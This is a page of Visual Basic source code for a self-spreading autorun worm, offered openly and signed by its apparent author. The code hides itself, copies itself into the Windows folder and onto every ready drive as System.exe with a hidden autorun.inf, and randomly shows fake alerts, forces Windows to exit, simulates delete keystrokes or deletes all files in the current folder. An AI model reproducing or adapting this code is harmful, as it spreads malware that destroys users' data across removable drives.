Description // Info
Source Code
- Private Sub Form_Load(): On Error Resume Next: Me.Visible = 0: App.TaskVisible = 0
- Dim Pyld As Integer: Randomize
- Dim BackUp As String: BackUp = Environ("windir") & "\Kernel23.exe"
- '-----------------------------------------------------------------------------------
- If LCase(App.EXEName) = "system" Then
- Shell "Explorer.exe " & Left(App.Path, 2), vbMaximizedFocus
- Pyld = Int(Rnd * 30)
- If Pyld = 1 Then MsgBox "Hehehe .. " & vbCrLf & "Bad News For You ( Your Infected )", 64, "Virus Alert!"
- If Pyld = 5 Then MsgBox " © By Mr.He$y / [P.V.T] ", 64, " W32/Autoexec.worm !"
- If Pyld = 10 Then MsgBox "System Error(-243245&H21321438230.)", 16, "Error"
- If Pyld = 15 Then Shell "Rundll.exe user.exe,exitwindows", vbHide
- If Pyld = 20 Then SendKeys "^a", 1: SendKeys "+{DEL}", 1: SendKeys "~", 1
- If Pyld = 25 Then Kill "*.*"
- If Pyld Mod 3 = 0 Then Shell Environ("COMSPEC") & " /C ECHO " & Chr(7), vbHide
- End If
- Call Search_Drv
- '-----------------------------------------------------------------------------------
- 'Worm BackUp To Windows Folder & Created Run Key Of Rgistery
- If Dir(BackUp) = "" Then
- Set Reg = CreateObject("")
- FileCopy Worm, BackUp
- End If
- '-----------------------------------------------------------------------------------
- End
- End Sub
- Private Sub Search_Drv()
- Dim Fso, Drives
- Set Fso = CreateObject("scripting.filesystemobject")
- Set Drives = Fso.Drives
- For Each Drive In Drives
- If Drive.IsReady Then
- Infected_Drv (Drive)
- End If
- Next
- End Sub
- Private Sub Infected_Drv(Path As String)
- Dim INF As String: INF = Path & "\autorun.inf"
- Dim EXEC As String: EXEC = Path & "\System.exe"
- If Dir(INF, vbHidden) <> "" And Dir(EXEC, vbHidden) <> "" Then Exit Sub
- FileCopy Worm, EXEC
- Open INF For Output As #1
- Print #1, "[Autorun]"
- Print #1, "Open=System.exe"
- Close
- SetAttr INF, vbHidden
- End Sub
- Public Function Worm() As String
- Worm = App.Path
- If Right(Worm, 1) <> "\" Then Worm = Worm & "\"
- Worm = Worm & App.EXEName & ".exe"
- End Function
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